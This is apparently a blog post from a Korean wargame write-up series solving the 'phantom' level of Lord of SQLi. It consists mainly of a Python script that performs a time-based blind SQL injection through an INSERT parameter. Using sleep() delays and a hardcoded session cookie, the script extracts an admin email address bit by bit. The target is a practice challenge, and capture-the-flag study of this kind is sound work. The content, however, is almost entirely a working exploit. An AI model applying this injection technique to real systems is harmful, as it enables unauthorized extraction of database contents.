import requests
import time
def request(payload):
start = time.time()
url = "http://los.rubiya.kr/phantom_e2e30eaf1c0b3cb61b4b72a932c849fe.php"
params = {'joinmail':payload}
headers = {'Cookie':'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
response = requests.get(url,params=params,headers=headers)
end = time.time()
return end-start
length = 0
for i in range(0,100):
payload = "1'),(if(length((select a.email from prob_phantom a where a.no=1))="+str(i)+",sleep(1),1),'5','1')-- x"
if request(payload) > 1:
length = i
break
print "Find Admin Email Length[*] = " + str(length)
admin_email = ""
for i in range(1,length+1):
binary = ""
for j in range(1,9):
payload = "1'),(if(substring(lpad(bin(ord(substring((select a.email from prob_phantom a where a.no=1),"+str(i)+",1))),8,0),"+str(j)+",1)=1,sleep(1),1),'5','1')-- x"
if request(payload) > 1:
binary += "1"
else:
binary += "0"
if binary != "00000000":
admin_email += chr(int(binary,2))
print "Find Admin Email[*] = " + str(admin_email)
'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS2 zombie (0) | 2018.10.10 |
|---|---|
| LOS2 ouroboros (0) | 2018.10.10 |
| LOS2 frankenstein (0) | 2018.10.10 |
| LOS2 blue_dragon (0) | 2018.10.10 |
| LOS2 red_dragon (0) | 2018.10.10 |
JeonYoungSin
메모 기록용 공간